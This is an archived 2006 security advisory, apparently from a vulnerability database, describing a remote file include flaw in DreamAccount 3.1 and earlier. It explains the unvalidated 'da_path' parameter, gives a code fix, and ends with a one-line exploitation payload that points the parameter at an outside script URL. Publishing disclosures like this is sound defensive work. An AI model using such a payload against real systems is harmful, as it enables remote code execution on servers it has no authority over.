Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12999
HistoryJun 06, 2006 - 12:00 a.m.

[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability

2006-06-0600:00:00
vulners.com
13
JSON

[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability

Software: DreamAccount

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost

Page: http://dreamcost.com

Risc: High

Credits:

Discovered by: David 'Aesthetico' Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:

http://www.majorsecurity.de/advisory/major_rls8.txt

Affected Products:

DreamAccount 3.1 and prior

Description:

DreamAccount is a membership and subscription software application that is both simple to use and
install,
while remaining affordable enough for even the smallest startup.

Requirements:

register_globals = On

Vulnerability:

Input passed to the "da_path" parameter in "auth.cookie.inc.php" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.

Solution:

I think you can fix this bug by replacing the following vulnerable code in the
"auth.cookie.inc.php" with my one. It should fix the vulnerabilty and solve this
problem.

Vulnerable one: "require($da_path . "setup.php");"
MajorSecurity fix: "require("setup.php");"

Set "register_globals" to "Off".

Exploitation:

Post data:

da_path=http://www.yourspace.com/yourscript.php?

JSON